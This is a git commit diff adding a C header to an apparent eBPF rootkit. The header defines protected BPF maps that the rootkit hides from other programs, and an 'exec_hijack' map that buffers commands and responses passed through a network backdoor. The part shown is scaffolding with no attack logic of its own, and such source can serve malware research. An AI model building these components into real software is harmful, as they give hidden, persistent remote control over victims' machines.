Added new map structure, in preparation for new internal maps storing requested commands via the network backdoor

2025-12-26 03:13:07 +08:00 · 2022-02-14 20:08:30 -05:00
parent edbaf09c06
commit 2ae705f037
8 changed files with 1678 additions and 1636 deletions
--- a/src/common/map_prot.h
+++ b/src/common/map_prot.h
@@ -0,0 +1,29 @@
+#ifndef __MAP_PROT_H
+#define __MAP_PROT_H
+
+#include "headervmlinux.h"
+
+/*PRIVATE MAPS*/
+//Any attempt to access these maps will be blocked by the rootkit
+//Exclusive to bpf, see /src/bpf/defs.h
+
+
+/*PROTECTED MAPS*/
+//Any attempt to access these maps will be blocked by the rootkit if the program is not whitelisted
+
+//Execution hijacking, holder of requesting/response data sent from/to the network backdoor
+#define EXEC_HIJACK_REQUEST_PROGRAM_MAX_LEN 256
+#define EXEC_HIJACK_RESPONSE_PROGRAM_MAX_LEN 256
+struct exec_hijack_data{ //Map value
+	char req_buf[EXEC_HIJACK_REQUEST_PROGRAM_MAX_LEN];
+    char res_buf[EXEC_HIJACK_RESPONSE_PROGRAM_MAX_LEN];
+};
+
+struct exec_prot_hijack{ //Map
+	__uint(type, BPF_MAP_TYPE_ARRAY);
+	__uint(max_entries, 1);
+	__type(key, __u32); //just 1 entry allowed
+	__type(value, struct exec_hijack_data);
+} exec_hijack SEC(".maps");
+
+#endif